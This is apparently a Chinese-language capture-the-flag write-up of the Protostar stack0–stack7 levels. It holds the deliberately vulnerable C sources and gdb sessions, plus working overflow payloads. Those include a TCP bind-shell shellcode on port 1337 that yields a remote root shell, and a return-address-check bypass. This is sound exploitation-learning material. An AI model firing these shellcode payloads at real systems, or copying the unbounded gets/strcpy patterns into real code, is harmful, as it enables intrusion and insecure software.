Protostar Stack0
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
/* Protostar stack0: deliberately vulnerable challenge program.
 * Reads one line into a fixed 64-byte stack buffer with gets(), then
 * reports whether the neighbouring local `modified` is still zero.
 * argc/argv are unused. main falls off the end without a return. */
int main(int argc, char **argv)
{
/* volatile: the store of 0 and the later compare must not be optimised
 * away, since the value is expected to change behind the compiler's back. */
volatile int modified;
char buffer[64];
modified = 0;
/* gets() takes no length: anything past 64 bytes is written beyond
 * buffer. The run on this page shows 68 input bytes are enough to
 * reach `modified` on that build (layout is compiler-dependent). */
gets(buffer);
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
思路:buffer溢出改變modified的值
$ echo `python -c "print 'A'*68"` | /opt/protostar/bin/stack0
you have changed the 'modified' variable
Protostar Stack1
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
/* Protostar stack1: copies argv[1] into a 64-byte stack buffer with an
 * unbounded strcpy() and checks whether the neighbouring local
 * `modified` now holds the exact value 0x61626364 ("abcd" as bytes).
 * Exits via errx(1, ...) when no argument is given. */
int main(int argc, char **argv)
{
/* volatile: keep the zero store and the compare from being folded away. */
volatile int modified;
char buffer[64];
if(argc == 1) {
/* NOTE: errx() is declared in <err.h>, which is not among the headers
 * included above; this compiles only via an implicit declaration. */
errx(1, "please specify an argument\n");
}
modified = 0;
/* strcpy() copies up to argv[1]'s NUL with no bound; input longer than
 * 64 bytes runs past buffer. The run on this page shows 64 bytes + 4
 * reach `modified` on that build. */
strcpy(buffer, argv[1]);
if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
/* %08x with a volatile int: prints the value that actually landed. */
printf("Try again, you got 0x%08x\n", modified);
}
}
思路:buffer溢出改變modified的值爲0x61626364
$ /opt/protostar/bin/stack1 `python -c "print 'A'*64+'\x64\x63\x62\x61'"`
you have correctly got the variable to the right value
Protostar Stack2
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
/* Protostar stack2: same shape as stack1, but the unbounded source is
 * the GREENIE environment variable rather than argv[1]. Target value
 * for `modified` is 0x0d0a0d0a (CR/LF bytes). */
int main(int argc, char **argv)
{
/* volatile: keep the zero store and the compare from being folded away. */
volatile int modified;
char buffer[64];
char *variable;
/* getenv() returns NULL when the variable is unset; that is the only
 * validation done on it -- its length is never checked. */
variable = getenv("GREENIE");
if(variable == NULL) {
/* NOTE: errx() needs <err.h>, which is not included above. */
errx(1, "please set the GREENIE environment variable\n");
}
modified = 0;
/* Unbounded copy of attacker-controlled environment data into a
 * 64-byte buffer; longer values overrun it. */
strcpy(buffer, variable);
if(modified == 0x0d0a0d0a) {
printf("you have correctly modified the variable\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
思路:buffer溢出改變modified的值爲0x0d0a0d0a,而buffer是從環境變量GREENIE複製過來的,所以設置一下該環境變量就好。
$ export GREENIE=`python -c "print 'A'*64+'\x0a\x0d\x0a\x0d'"`
$ ./stack2
you have correctly modified the variable
這是在自己本地的Ubuntu 16.04下的執行結果
但在protostar虛擬機裏,執行失敗
$ export GREENIE=`python -c "print 'A'*64+'\x0a\x0d\x0a\x0d'"`
: bad variable name
不給設置這樣的變量名
不服,寫個腳本試試
# The shell rejected the export of GREENIE (": bad variable name"), so the
# variable is placed in the environment from Python and the challenge
# binary is started as a child process, inheriting it.
import os

os.environ.update({'GREENIE': 'A' * 64 + '\x0a\x0d\x0a\x0d'})
os.system('./stack2')
$ python se.py
you have correctly modified the variable
OK
Protostar Stack3
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
/* Never called directly by this program; it only runs if control flow
 * is redirected to it. Prints a marker line and returns. */
void win()
{
printf("code flow successfully changed\n");
}
/* Protostar stack3: zeroes a function pointer that lives on the stack
 * next to a 64-byte buffer, fills the buffer with gets(), and calls
 * through the pointer if it is no longer NULL. */
int main(int argc, char **argv)
{
/* Pointer to a function with an unspecified parameter list; volatile so
 * the zero store and the later test are both kept. */
volatile int (*fp)();
char buffer[64];
fp = 0;
/* Unbounded read: the run on this page shows 64 bytes + 4 reach fp. */
gets(buffer);
if(fp) {
/* NOTE: %08x expects an unsigned int but is given a function pointer --
 * a format/argument mismatch (undefined behaviour, works by accident
 * on 32-bit where both are 4 bytes). %p would be the matching spec. */
printf("calling function pointer, jumping to 0x%08x\n", fp);
/* Indirect call to whatever address fp now holds. */
fp();
}
}
思路:查安全機制
$ checksec stack3
[*] '/home/jc/pwn/stack3'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
什麼都沒開,那麼只需要反彙編看一下win的地址,利用buffer溢出就好
$ gdb -q stack3
Reading symbols from stack3...done.
gdb-peda$ disassemble win
Dump of assembler code for function win:
0x08048424 <+0>: push ebp
0x08048425 <+1>: mov ebp,esp
0x08048427 <+3>: sub esp,0x18
0x0804842a <+6>: mov DWORD PTR [esp],0x8048540
0x08048431 <+13>: call 0x8048360 <puts@plt>
0x08048436 <+18>: leave
0x08048437 <+19>: ret
End of assembler dump.
找到win()的地址爲0x08048424,編寫payload過關
$ echo `python -c "print 'A'*64+'\x24\x84\x04\x08'"` | /opt/protostar/bin/stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed
Protostar Stack4
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
/* Unreferenced by main; only reachable if the saved return address is
 * redirected here. Prints a marker line. */
void win()
{
printf("code flow successfully changed\n");
}
/* Protostar stack4: a single 64-byte buffer filled by gets() and nothing
 * else. There is no local between buffer and main's saved frame, so an
 * overlong line reaches the saved return address -- the run on this
 * page finds it at offset 76 on that build. */
int main(int argc, char **argv)
{
char buffer[64];
/* Unbounded read into a fixed-size buffer. */
gets(buffer);
}
代碼真簡潔!
思路:溢出buffer,造成崩潰,找到rip被覆蓋的偏移量,放入win()的地址
$ gdb -q stack4
Reading symbols from stack4...done.
gdb-peda$ pattern_create 138
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAA'
gdb-peda$ r
Starting program: /home/jc/pwn/stack4
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAA
Program received signal SIGSEGV, Segmentation fault.
EIP: 0x41344141 ('AA4A')
gdb-peda$ pattern_offset AA4A
AA4A found at offset: 76
覆蓋eip的偏移量爲76
gdb-peda$ p win
$3 = {void (void)} 0x80483f4 <win>
win()的地址爲0x80483f4
$ echo `python -c "print 'A'*76+'\xf4\x83\x04\x08'"` | /opt/protostar/bin/stack4
code flow successfully changed
Segmentation fault
Protostar Stack5
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
/* Protostar stack5: identical body to stack4's main, but with no win()
 * helper in the binary -- the level relies on the build having no
 * canary, no NX and no PIE (see the checksec output on this page). */
int main(int argc, char **argv)
{
char buffer[64];
/* Unbounded read into a fixed-size buffer; offset 76 reaches the
 * saved return address on that build per the run on this page. */
gets(buffer);
}
思路:檢查安全機制
$ checksec stack5
[*] '/home/jc/pwn/stack5'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
什麼也沒開,所以,應該可以控制eip,執行shellcode。找到一個shell_bind_tcp 的shellcode,共89字節,端口號爲1337。
生成長度爲200的測試字符串
$ gdb -q stack5
Reading symbols from stack5...done.
gdb-peda$ pattern_create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
運行
gdb-peda$ r
Starting program: /home/jc/pwn/stack5
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
ESP: 0xffffcec0 ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41344141 ('AA4A')
eip崩潰在0x41344141(‘AA4A’)
gdb-peda$ pattern_offset AA4A
AA4A found at offset: 76
偏移量爲76
此時esp的地址爲0xffffcec0,也是我們控制eip要轉到的地址,內容爲
AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
長度爲120,可以容納89字節的shellcode,還可以在shellcode前執行一段nop指令。構造payload:'A'*76+shellcode地址+shellcode
echo `python -c "print 'A'*76+'\xc0\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
Segmentation fault (core dumped)
Segmentation fault!查看core
gdb -q stack5 core
Reading symbols from stack5...done.
[New LWP 17461]
Core was generated by `./stack5'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0xffffceff in ?? ()
查看0xffffceff附近的存儲情況
gdb-peda$ x/20b 0xffffceff
0xffffceff: 0xff 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xffffcf07: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xffffcf0f: 0x90 0x6a 0x66 0x58
我們的shellcode的起始地址是0xffffcf00,而不是0xffffcec0,修改payload
echo `python -c "print 'A'*76+'\x00\xcf\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
Segmentation fault (core dumped)
還是Segmentation fault!再查看core
$ gdb -q stack5 core
Reading symbols from stack5...done.
[New LWP 17571]
Core was generated by `./stack5'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x90ffffcf in ?? ()
查看附近內存
gdb-peda$ x/20b 0xffffcf00
0xffffcf00: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xffffcf08: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x6a
0xffffcf10: 0x66 0x58 0x6a 0x1
gdb-peda$ x/20b 0xffffcef8
0xffffcef8: 0x41 0x41 0x41 0x41 0xcf 0xff 0xff 0x90
0xffffcf00: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xffffcf08: 0x90 0x90 0x90 0x90
發現我們的設置的返回地址0xffffcf00中的\x00字節不在內存中,悟了!\x00字節發送不了!但是我設了16個字節的nop,返回地址往後移1到16位都行,對吧?就移1位好了,修改返回地址爲0xffffcf01
echo `python -c "print 'A'*76+'\x01\xcf\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
$ nc localhost 1337
whoami
jc
成功!
protostar虛擬機裏的esp的地址:0xbffffcc0
$ echo `python -c "print 'A'*76+'\xc0\xfc\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack5
$ nc protostar 1337
whoami
root
protostar虛擬機裏沒有發現gdb與直接運行時esp不一致的問題
Protostar Stack6
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
/* Protostar stack6: reads a line into a 64-byte buffer with gets(), then
 * inspects its own return address and refuses (via _exit(1)) to return
 * to an address whose top byte has every bit of 0xbf set. Otherwise
 * echoes the line. Prompt is flushed explicitly because stdout may be
 * a pipe, where it is fully buffered. */
void getpath()
{
char buffer[64];
/* The return address is captured into an unsigned int, not a pointer:
 * an implicit pointer-to-integer conversion (exact on 32-bit only). */
unsigned int ret;
printf("input path please: "); fflush(stdout);
/* Unbounded read; the run on this page finds the return address at
 * offset 80 on that build. */
gets(buffer);
/* Read AFTER gets(), so `ret` already reflects any overwrite of the
 * saved return address. */
ret = __builtin_return_address(0);
/* Masking with 0xbf000000 matches any address whose top byte contains
 * all of 0xbf's bits -- 0xbf...... and also 0xff...... -- i.e. the
 * stack region on the VM this page targets. */
if((ret & 0xbf000000) == 0xbf000000) {
/* NOTE: %p expects a pointer but receives an unsigned int -- a
 * format/argument mismatch (undefined behaviour). */
printf("bzzzt (%p)\n", ret);
/* _exit: terminate without running atexit handlers or flushing stdio. */
_exit(1);
}
printf("got path %s\n", buffer);
}
/* Entry point: delegates everything to getpath(); argc/argv unused. */
int main(int argc, char **argv)
{
getpath();
}
返回地址被限制不能在棧中我們可操作的部分
思路:雖然被限制了,但只是限制了getpath函數的返回地址不能直接返回到shellcode的地址,可以控制指令重新返回到getpath的ret指令的地址,此時只要在棧頂設置好shellcode的地址,就可以繞過限制
$ gdb -q stack6
Reading symbols from stack6...done.
gdb-peda$ pattern_create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
gdb-peda$ r
Starting program: /home/jc/pwn/stack6
input path please: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
got path AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAJAAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
ESP: 0xffffceb0 ("fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41414a41 ('AJAA')
gdb-peda$ pattern_offset AJAA
AJAA found at offset: 80
這次getpath()的返回地址偏移量爲80
gdb-peda$ x/s $esp
0xffffceb0: "fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"
gdb-peda$ pattern_offset fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA found at offset: 84
棧指針地址爲0xffffceb0,偏移量爲84
構造payload:'A'*80+ret指令地址+ret返回地址(shellcode地址,esp+4)+shellcode
$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\xb4\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA����������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
h//shh/bin��A��̀
Segmentation fault (core dumped)
Segmentation fault!查看core文件
$ gdb -q stack6 core
Reading symbols from stack6...done.
[New LWP 14242]
Core was generated by `./stack6'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0xffffcebd in ?? ()
查一下附近的存儲情況
gdb-peda$ x/100b 0xffffce78
0xffffce78: 0x00 0x70 0xfb 0xf7 0x41 0x41 0x41 0x41
0xffffce80: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce88: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce90: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce98: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffcea0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffcea8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffceb0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffceb8: 0x41 0x41 0x41 0x41 0xf9 0x84 0x04 0x08
0xffffcec0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffcec8: 0x41 0x41 0x41 0x41 0xf9 0x84 0x04 0x08
0xffffced0: 0xb4 0xce 0xff 0xff 0x90 0x90 0x90 0x90
0xffffced8: 0x90 0x90 0x90 0x90
gdb-peda$ p $esp
$2 = (void *) 0xffffced4
發現問題了:我們第二次的返回地址應該是0xffffced4,而不是0xffffceb4
而且在連續存儲64個A之後,出現了有4個A被替換的情況,此處不解,路過的friend懂的希望不吝賜教。(一個可能的解釋:緊跟在buffer後面的4個字節是局部變量ret,而ret = __builtin_return_address(0)是在gets之後才執行的,寫入的值正是已被覆蓋的返回地址'AJAA'(0x41414a41),所以printf時這4個字節被打印成AJAA;此推測有待驗證。)
修改payload
$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\xd4\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA����������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
h//shh/bin��A��̀
$ nc localhost 1337
whoami
jc
上面是在本機Ubuntu上折騰的結果。在protostar的虛擬機上,同樣棧指針的地址要加32個字節。獲得的esp地址是0xbffffd20,本來+4就是0xbffffd24,但是要再加32個字節變成0xbffffd44纔是正解。
$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\x44\xfd\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA��D�������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
h//shh/bin��A��̀
$ nc protostar 1337
whoami
root
我嘗試了在gdb裏執行payload,發現gdb裏是不用加32字節的,難道是gdb與系統直接運行的區別?
Protostar Stack7
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
/* Protostar stack7: same as stack6's getpath() with two changes -- the
 * return-address mask is the looser 0xb0000000, and the line is
 * returned as a strdup()'d heap copy (caller owns and must free it). */
char *getpath()
{
char buffer[64];
/* Return address captured as an integer (pointer-to-int conversion). */
unsigned int ret;
printf("input path please: "); fflush(stdout);
/* Unbounded read into a 64-byte buffer. */
gets(buffer);
/* Captured after gets(), so it reflects any overwrite already done. */
ret = __builtin_return_address(0);
/* Mask 0xb0000000: rejects any address whose top byte has bits 0xb0
 * set (0xb?......, 0xf?......), a wider range than stack6's check. */
if((ret & 0xb0000000) == 0xb0000000) {
/* NOTE: %p given an unsigned int -- format/argument mismatch (UB). */
printf("bzzzt (%p)\n", ret);
_exit(1);
}
printf("got path %s\n", buffer);
/* Heap allocation; strdup() may return NULL on allocation failure,
 * which is passed through unchecked. */
return strdup(buffer);
}
/* Entry point: calls getpath() and discards its strdup()'d result, so
 * the heap copy is leaked (harmless here, the process exits right after). */
int main(int argc, char **argv)
{
getpath();
}
思路:和stack6一樣的解法
ret指令的地址:0x08048544
shellcode的起始地址:0xbffffcd4
$ echo `python -c "print 'A'*80+'\x44\x85\x04\x08'+'\xd4\xfc\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack7
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD�AAAAAAAAAAAAD���������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
h//shh/bin��A��̀
$ nc protostar 1337
whoami
root
小結
失敗不可怕,可怕的是不去找出失敗的原因。